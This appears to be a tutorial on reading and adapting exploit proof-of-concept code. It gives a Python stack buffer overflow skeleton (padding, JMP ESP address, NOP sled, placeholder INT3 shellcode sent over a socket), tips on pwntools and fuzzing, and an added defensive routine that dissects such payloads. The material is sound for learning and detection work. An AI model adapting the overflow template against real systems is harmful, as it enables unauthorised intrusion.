When a new CVE drops, there is no Metasploit module yet. There is usually a crude Python script ("Proof of Concept"). Understanding how to read, modify, and improve these scripts is a critical skill.

```python
# Basic Buffer Overflow Skeleton
import socket

target = "192.168.1.10"
port = 9999

# EIP Overwrite Pattern
padding = b"A" * 2000
eip = b"\xaf\x11\x50\x62"  # Memory address of JMP ESP
nop_sled = b"\x90" * 32
shellcode = b"\xcc\xcc\xcc"  # INT3 Breakpoint

payload = padding + eip + nop_sled + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(payload)
s.close()
```

Pwntools

Don't write raw sockets for CTFs. Use pwntools.
It handles endianness (`p32(0xdeadbeef)`), SSH connections, and GDB debugging automatically.
It makes exploit development 10x faster.
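The four `eip` bytes in the skeleton are a 32-bit address stored least-significant byte first, which is the packing `p32` performs. The following is an added example, not code from the original page: it reads that layout in the other direction, splitting a captured buffer into filler, return address, NOP sled and tail the way someone reviewing a PoC or writing a detection rule would. The function names, thresholds and sample buffers are assumptions made for the example.

```python
import struct

NOP = 0x90  # x86 single-byte no-op

def run_length(data: bytes, start: int) -> int:
    """Length of the run of identical bytes that begins at `start`."""
    end = start
    while end < len(data) and data[end] == data[start]:
        end += 1
    return end - start

def dissect(buf: bytes, min_fill: int = 64, min_sled: int = 8):
    """Split `buf` into filler / return address / NOP sled / tail.

    Returns None when the buffer does not have that layout. The thresholds
    are assumptions chosen for this example, not tuned values.
    """
    fill_len = run_length(buf, 0)
    addr_end = fill_len + 4
    if fill_len < min_fill or len(buf) < addr_end:
        return None
    # The 4 bytes after the filler land on the saved return address.
    # x86 stores integers least-significant byte first, hence "<I".
    (ret_addr,) = struct.unpack("<I", buf[fill_len:addr_end])
    sled_len = run_length(buf, addr_end) if buf[addr_end:addr_end + 1] == bytes([NOP]) else 0
    if sled_len < min_sled:
        return None
    return {
        "fill_byte": buf[0],
        "fill_len": fill_len,
        "return_address": ret_addr,
        "sled_len": sled_len,
        "tail": buf[addr_end + sled_len:],
    }

# Constructed samples: the skeleton's payload, and ordinary traffic.
SAMPLE = b"A" * 2000 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + b"\xcc\xcc\xcc"
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"

if __name__ == "__main__":
    info = dissect(SAMPLE)
    print(f"filler {info['fill_len']} x {info['fill_byte']:#04x}, "
          f"return address {info['return_address']:#010x}, "
          f"sled {info['sled_len']}, tail {info['tail'].hex()}")
    print("benign:", dissect(BENIGN))
```

The run-length heuristic miscounts by one byte when the low byte of the return address equals the filler byte, so treat the reported offset as a starting point for manual review.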

1. Fuzzing

Before you can write an exploit, you must find the bug.
Write a Python script to send random garbage to the target application until it crashes.
Then analyze the crash dump to see if you control the Instruction Pointer (EIP).